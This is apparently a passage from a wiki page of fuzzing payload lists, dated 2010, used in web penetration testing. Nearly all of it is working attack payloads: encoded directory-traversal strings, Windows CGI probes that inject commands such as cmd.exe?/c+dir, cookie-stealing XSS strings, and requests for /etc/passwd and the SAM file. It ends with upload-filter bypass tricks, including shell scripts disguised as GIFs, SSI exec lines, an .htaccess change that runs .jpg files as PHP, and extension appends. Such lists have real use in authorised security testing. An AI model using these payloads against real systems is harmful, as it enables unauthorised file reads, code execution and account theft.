%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
///%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
\\\%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..//{FILE}&lt;br /&gt;
..//..//{FILE}&lt;br /&gt;
..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
..///..///{FILE}&lt;br /&gt;
..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..\\{FILE}&lt;br /&gt;
..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
./\/./{FILE}&lt;br /&gt;
./\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2010 &lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass (Update: 17 March 2010 - notes only) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumberated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== PHP-Specific Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# PHP-Specific File Upload Filter Bypass Appends  (Update: 17 March 2010 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;#Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends  (Update: 17 March 2010) &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
